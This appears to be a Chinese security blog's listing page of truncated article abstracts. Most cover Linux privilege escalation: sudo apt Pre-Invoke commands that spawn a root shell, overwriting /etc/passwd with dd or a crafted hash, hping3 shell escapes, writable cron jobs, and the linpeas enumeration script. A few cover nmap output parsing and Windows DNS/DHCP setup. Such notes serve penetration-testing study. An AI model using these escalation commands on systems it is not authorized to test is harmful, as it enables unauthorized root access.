隐念笎

摘要： passwd文件的密码会被系统优先教研，所以可以通过覆盖passwd文件来尝试进行提权 passwd密码文件格式为： root:x:0:0::/root:/bin/bash x为密码位，在用shadow前提下这个位置位x， 0:0分别是uid位和gid位，当为0时即为root权限 用如下命令生成密码 阅读全文

摘要： 两种提权方式 一、 TF=$(mktemp) echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF sudo apt install -c $TF sl 二、 sudo apt update -o APT::Update::Pre-Invoke::=/bin 阅读全文

摘要： 来自：https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh 这个脚本非常厉害，可以枚举linux操作系统几乎所有的可提权项，甚至可以通过su暴力 阅读全文

摘要： 当scp命令有免密sudo的权限时，可以用来进行提权到其他账号 1、确认scp有sudo免密权限 test@test:~$ sudo -l sudo -l Matching Defaults entries for test on test: env_reset, mail_badpass, sec 阅读全文

摘要： 当hping3工具有个神奇的地方，hping3支持交互式运行，终端中输入hping3后可以进入一个hping3的控制台，这个控制台不但可以执行hping3自己的命令，也可以把非自身命令定向到shell终端去，当作系统命令执行，因此当hping3具有suid位或者用户有权限通过sudo执行hping3 阅读全文

摘要： 一、Nmap 1、对nmap -sP x.x.x.x结果处理，查找存活的主机 cat result |grep "report for"|awk '{print $5}' 2、对nmap -sV -p 0-65535 -iL iplist结果进行处理，筛选所有主机开放的端口 cat result | 阅读全文

摘要： 当用户可以通过sudo执行dd命令时，可以被用来提权。通过dd命令覆盖原始/etc/passwd文件，以达到修改密码的目的 1、创建一个已知密码的hash，以备替换时使用 hh@hh:/etc$ openssl passwd -1 -salt 123 password $1$123$0HaaUtbh 阅读全文

摘要： 1、计划任务提权法： 进入机器后，寻找root，通过查看/etc/crontab，或者/etc/cron.*中的计划任务，看是否存在root权限调用的计划任务，如果这些计划任务的脚本可以被任意用户修改，可以通过在这些计划任务中增加提权脚本进行提权 2、命令截断提权： 假设某程序如下代码，其中syst 阅读全文

摘要： 通常情况下配置好域后，DNS会默认安装好，但有时候这个DNS只能解析域控的域名，不能解析其他域名，比如baidu.com之类的。此时需要配置转发器，把不能解析的域名转到其他DNS配置如下： 打开DNS管理器，右击所用的服务器，点击属性 在属性对话框选择转发器，点击编辑即可添加其他DNS服务器，你可以 阅读全文

摘要： *本文转自https://blog.51cto.com/lumay0526/2046957 简述 DHCP是Dynamic Host Configuration Protocol的缩写，中文称动态主机配置协议；通常被用于大型网络环境中，主要作用是集中管理、分配IP地址；在局域网中的主机可以动态的获取 阅读全文